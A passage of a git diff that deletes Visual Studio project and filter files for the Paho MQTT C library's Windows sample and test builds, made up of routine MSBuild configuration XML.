-      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src</AdditionalIncludeDirectories>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Console</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <AdditionalLibraryDirectories>$(SolutionDir)\x64\$(Configuration)\</AdditionalLibraryDirectories>
-      <AdditionalDependencies>paho-mqtt3c.lib;%(AdditionalDependencies)</AdditionalDependencies>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <ClCompile>
-      <WarningLevel>Level3</WarningLevel>
-      <PrecompiledHeader>
-      </PrecompiledHeader>
-      <Optimization>MaxSpeed</Optimization>
-      <FunctionLevelLinking>true</FunctionLevelLinking>
-      <IntrinsicFunctions>true</IntrinsicFunctions>
-      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src</AdditionalIncludeDirectories>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Console</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <EnableCOMDATFolding>true</EnableCOMDATFolding>
-      <OptimizeReferences>true</OptimizeReferences>
-      <AdditionalDependencies>paho-mqtt3c.lib;%(AdditionalDependencies)</AdditionalDependencies>
-      <AdditionalLibraryDirectories>$(SolutionDir)..\build\output\</AdditionalLibraryDirectories>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
-    <ClCompile>
-      <WarningLevel>Level3</WarningLevel>
-      <PrecompiledHeader>
-      </PrecompiledHeader>
-      <Optimization>MaxSpeed</Optimization>
-      <FunctionLevelLinking>true</FunctionLevelLinking>
-      <IntrinsicFunctions>true</IntrinsicFunctions>
-      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src</AdditionalIncludeDirectories>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Console</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <EnableCOMDATFolding>true</EnableCOMDATFolding>
-      <OptimizeReferences>true</OptimizeReferences>
-      <AdditionalDependencies>paho-mqtt3c.lib;%(AdditionalDependencies)</AdditionalDependencies>
-      <AdditionalLibraryDirectories>$(SolutionDir)\x64\$(Configuration)\</AdditionalLibraryDirectories>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemGroup>
-    <ClCompile Include="..\..\src\samples\paho_cs_sub.c" />
-  </ItemGroup>
-  <ItemGroup>
-    <ClInclude Include="..\..\src\MQTTClient.h" />
-    <ClInclude Include="..\..\src\MQTTClientPersistence.h" />
-  </ItemGroup>
-  <ItemGroup>
-    <ProjectReference Include="..\paho-mqtt3cs\paho-mqtt3cs.vcxproj">
-      <Project>{17f07f98-aa5f-4373-9877-992a341d650a}</Project>
-    </ProjectReference>
-  </ItemGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
-  <ImportGroup Label="ExtensionTargets">
-  </ImportGroup>
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/stdoutsub/stdoutsub.vcxproj.filters b/thirdparty/paho.mqtt.c/Windows Build/stdoutsub/stdoutsub.vcxproj.filters
deleted file mode 100644
index 1cfc2b2..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/stdoutsub/stdoutsub.vcxproj.filters
+++ /dev/null
@@ -1,30 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <ItemGroup>
-    <Filter Include="Source Files">
-      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
-      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
-    </Filter>
-    <Filter Include="Header Files">
-      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
-      <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
-    </Filter>
-    <Filter Include="Resource Files">
-      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
-      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
-    </Filter>
-  </ItemGroup>
-  <ItemGroup>
-    <ClCompile Include="..\..\src\samples\paho_cs_sub.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-  </ItemGroup>
-  <ItemGroup>
-    <ClInclude Include="..\..\src\MQTTClient.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTClientPersistence.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-  </ItemGroup>
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/stdoutsub/stdoutsub.vcxproj.user b/thirdparty/paho.mqtt.c/Windows Build/stdoutsub/stdoutsub.vcxproj.user
deleted file mode 100644
index ace9a86..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/stdoutsub/stdoutsub.vcxproj.user
+++ /dev/null
@@ -1,3 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/stdoutsuba/stdoutsuba.vcxproj b/thirdparty/paho.mqtt.c/Windows Build/stdoutsuba/stdoutsuba.vcxproj
deleted file mode 100644
index 767166f..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/stdoutsuba/stdoutsuba.vcxproj
+++ /dev/null
@@ -1,170 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <ItemGroup Label="ProjectConfigurations">
-    <ProjectConfiguration Include="Debug|Win32">
-      <Configuration>Debug</Configuration>
-      <Platform>Win32</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Debug|x64">
-      <Configuration>Debug</Configuration>
-      <Platform>x64</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Release|Win32">
-      <Configuration>Release</Configuration>
-      <Platform>Win32</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Release|x64">
-      <Configuration>Release</Configuration>
-      <Platform>x64</Platform>
-    </ProjectConfiguration>
-  </ItemGroup>
-  <PropertyGroup Label="Globals">
-    <ProjectGuid>{AF322561-C692-43D3-8502-CC1E6CD2869A}</ProjectGuid>
-    <Keyword>Win32Proj</Keyword>
-    <RootNamespace>paho-cs-pub</RootNamespace>
-    <ProjectName>paho-cs-pub</ProjectName>
-    <WindowsTargetPlatformVersion>10.0.14393.0</WindowsTargetPlatformVersion>
-  </PropertyGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
-    <ConfigurationType>Application</ConfigurationType>
-    <UseDebugLibraries>true</UseDebugLibraries>
-    <CharacterSet>Unicode</CharacterSet>
-    <PlatformToolset>v141</PlatformToolset>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
-    <ConfigurationType>Application</ConfigurationType>
-    <UseDebugLibraries>true</UseDebugLibraries>
-    <CharacterSet>Unicode</CharacterSet>
-    <PlatformToolset>v141</PlatformToolset>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
-    <ConfigurationType>Application</ConfigurationType>
-    <UseDebugLibraries>false</UseDebugLibraries>
-    <WholeProgramOptimization>true</WholeProgramOptimization>
-    <CharacterSet>Unicode</CharacterSet>
-    <PlatformToolset>v141</PlatformToolset>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
-    <ConfigurationType>Application</ConfigurationType>
-    <UseDebugLibraries>false</UseDebugLibraries>
-    <WholeProgramOptimization>true</WholeProgramOptimization>
-    <CharacterSet>Unicode</CharacterSet>
-    <PlatformToolset>v141</PlatformToolset>
-  </PropertyGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
-  <ImportGroup Label="ExtensionSettings">
-  </ImportGroup>
-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <PropertyGroup Label="UserMacros" />
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <LinkIncremental>true</LinkIncremental>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
-    <LinkIncremental>true</LinkIncremental>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <LinkIncremental>false</LinkIncremental>
-    <OutDir>$(SolutionDir)..\build\output\samples\</OutDir>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
-    <LinkIncremental>false</LinkIncremental>
-  </PropertyGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <ClCompile>
-      <PrecompiledHeader>
-      </PrecompiledHeader>
-      <WarningLevel>Level3</WarningLevel>
-      <Optimization>Disabled</Optimization>
-      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src</AdditionalIncludeDirectories>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Console</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <AdditionalDependencies>paho-mqtt3c.lib;%(AdditionalDependencies)</AdditionalDependencies>
-      <AdditionalLibraryDirectories>$(SolutionDir)\Debug</AdditionalLibraryDirectories>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
-    <ClCompile>
-      <PrecompiledHeader>
-      </PrecompiledHeader>
-      <WarningLevel>Level3</WarningLevel>
-      <Optimization>Disabled</Optimization>
-      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src</AdditionalIncludeDirectories>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Console</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <AdditionalDependencies>paho-mqtt3c.lib;%(AdditionalDependencies)</AdditionalDependencies>
-      <AdditionalLibraryDirectories>$(SolutionDir)\x64\$(Configuration)</AdditionalLibraryDirectories>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <ClCompile>
-      <WarningLevel>Level3</WarningLevel>
-      <PrecompiledHeader>
-      </PrecompiledHeader>
-      <Optimization>MaxSpeed</Optimization>
-      <FunctionLevelLinking>true</FunctionLevelLinking>
-      <IntrinsicFunctions>true</IntrinsicFunctions>
-      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src</AdditionalIncludeDirectories>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Console</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <EnableCOMDATFolding>true</EnableCOMDATFolding>
-      <OptimizeReferences>true</OptimizeReferences>
-      <AdditionalDependencies>paho-mqtt3c.lib;%(AdditionalDependencies)</AdditionalDependencies>
-      <AdditionalLibraryDirectories>$(SolutionDir)..\build\output\</AdditionalLibraryDirectories>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
-    <ClCompile>
-      <WarningLevel>Level3</WarningLevel>
-      <PrecompiledHeader>
-      </PrecompiledHeader>
-      <Optimization>MaxSpeed</Optimization>
-      <FunctionLevelLinking>true</FunctionLevelLinking>
-      <IntrinsicFunctions>true</IntrinsicFunctions>
-      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src</AdditionalIncludeDirectories>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Console</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <EnableCOMDATFolding>true</EnableCOMDATFolding>
-      <OptimizeReferences>true</OptimizeReferences>
-      <AdditionalDependencies>paho-mqtt3c.lib;%(AdditionalDependencies)</AdditionalDependencies>
-      <AdditionalLibraryDirectories>$(SolutionDir)\x64\$(Configuration)</AdditionalLibraryDirectories>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemGroup>
-    <ClCompile Include="..\..\src\samples\paho_cs_pub.c" />
-  </ItemGroup>
-  <ItemGroup>
-    <ClInclude Include="..\..\src\MQTTAsync.h" />
-    <ClInclude Include="..\..\src\MQTTClientPersistence.h" />
-  </ItemGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
-  <ImportGroup Label="ExtensionTargets">
-  </ImportGroup>
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/stdoutsuba/stdoutsuba.vcxproj.filters b/thirdparty/paho.mqtt.c/Windows Build/stdoutsuba/stdoutsuba.vcxproj.filters
deleted file mode 100644
index 69fd52a..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/stdoutsuba/stdoutsuba.vcxproj.filters
+++ /dev/null
@@ -1,30 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <ItemGroup>
-    <Filter Include="Source Files">
-      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
-      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
-    </Filter>
-    <Filter Include="Header Files">
-      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
-      <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
-    </Filter>
-    <Filter Include="Resource Files">
-      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
-      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
-    </Filter>
-  </ItemGroup>
-  <ItemGroup>
-    <ClCompile Include="..\..\src\samples\paho_cs_pub.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-  </ItemGroup>
-  <ItemGroup>
-    <ClInclude Include="..\..\src\MQTTAsync.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTClientPersistence.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-  </ItemGroup>
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/stdoutsuba/stdoutsuba.vcxproj.user b/thirdparty/paho.mqtt.c/Windows Build/stdoutsuba/stdoutsuba.vcxproj.user
deleted file mode 100644
index ace9a86..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/stdoutsuba/stdoutsuba.vcxproj.user
+++ /dev/null
@@ -1,3 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/test1/test1.vcxproj b/thirdparty/paho.mqtt.c/Windows Build/test1/test1.vcxproj
deleted file mode 100755
index 85f83a0..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/test1/test1.vcxproj
+++ /dev/null
@@ -1,173 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>

-<Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

-  <ItemGroup Label="ProjectConfigurations">

-    <ProjectConfiguration Include="Debug|Win32">

-      <Configuration>Debug</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Debug|x64">

-      <Configuration>Debug</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|Win32">

-      <Configuration>Release</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|x64">

-      <Configuration>Release</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-  </ItemGroup>

-  <PropertyGroup Label="Globals">

-    <ProjectGuid>{4E643090-289D-487D-BCA8-685EA2210480}</ProjectGuid>

-    <Keyword>Win32Proj</Keyword>

-    <RootNamespace>test1</RootNamespace>

-    <WindowsTargetPlatformVersion>10.0.14393.0</WindowsTargetPlatformVersion>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <PlatformToolset>v141</PlatformToolset>

-    <CharacterSet>Unicode</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <PlatformToolset>v141</PlatformToolset>

-    <CharacterSet>Unicode</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <PlatformToolset>v141</PlatformToolset>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>Unicode</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <PlatformToolset>v141</PlatformToolset>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>Unicode</CharacterSet>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />

-  <ImportGroup Label="ExtensionSettings">

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <PropertyGroup Label="UserMacros" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <LinkIncremental>true</LinkIncremental>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <LinkIncremental>true</LinkIncremental>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <LinkIncremental>false</LinkIncremental>

-    <OutDir>$(SolutionDir)..\build\output\test\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <LinkIncremental>false</LinkIncremental>

-  </PropertyGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>_WINDOWS;WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <SDLCheck>true</SDLCheck>

-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src</AdditionalIncludeDirectories>

-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <AdditionalLibraryDirectories>$(SolutionDir)\Debug\;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>

-      <AdditionalDependencies>ws2_32.lib;paho-mqtt3c.lib;%(AdditionalDependencies)</AdditionalDependencies>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>_WINDOWS;WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <SDLCheck>true</SDLCheck>

-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src</AdditionalIncludeDirectories>

-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <AdditionalLibraryDirectories>$(SolutionDir)\x64\$(Configuration)</AdditionalLibraryDirectories>

-      <AdditionalDependencies>ws2_32.lib;paho-mqtt3c.lib;%(AdditionalDependencies)</AdditionalDependencies>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>_WINDOWS;WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <SDLCheck>true</SDLCheck>

-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src</AdditionalIncludeDirectories>

-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-      <AdditionalLibraryDirectories>$(SolutionDir)..\build\output\;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>

-      <AdditionalDependencies>ws2_32.lib;paho-mqtt3c.lib;%(AdditionalDependencies)</AdditionalDependencies>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>_WINDOWS;WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <SDLCheck>true</SDLCheck>

-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src</AdditionalIncludeDirectories>

-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-      <AdditionalLibraryDirectories>$(SolutionDir)\x64\$(Configuration);%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>

-      <AdditionalDependencies>ws2_32.lib;paho-mqtt3c.lib;%(AdditionalDependencies)</AdditionalDependencies>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemGroup>

-    <ClCompile Include="..\..\test\test1.c" />

-  </ItemGroup>

-  <ItemGroup>

-    <ClInclude Include="..\..\src\MQTTClient.h" />

-    <ClInclude Include="..\..\src\MQTTClientPersistence.h" />

-  </ItemGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />

-  <ImportGroup Label="ExtensionTargets">

-  </ImportGroup>

-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/test1/test1.vcxproj.filters b/thirdparty/paho.mqtt.c/Windows Build/test1/test1.vcxproj.filters
deleted file mode 100644
index f5ae8ca..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/test1/test1.vcxproj.filters
+++ /dev/null
@@ -1,30 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <ItemGroup>
-    <Filter Include="Source Files">
-      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
-      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
-    </Filter>
-    <Filter Include="Header Files">
-      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
-      <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
-    </Filter>
-    <Filter Include="Resource Files">
-      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
-      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
-    </Filter>
-  </ItemGroup>
-  <ItemGroup>
-    <ClCompile Include="..\..\test\test1.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-  </ItemGroup>
-  <ItemGroup>
-    <ClInclude Include="..\..\src\MQTTClient.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTClientPersistence.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-  </ItemGroup>
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/test2/test2.vcxproj b/thirdparty/paho.mqtt.c/Windows Build/test2/test2.vcxproj
deleted file mode 100644
index 9043a64..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/test2/test2.vcxproj
+++ /dev/null
@@ -1,177 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
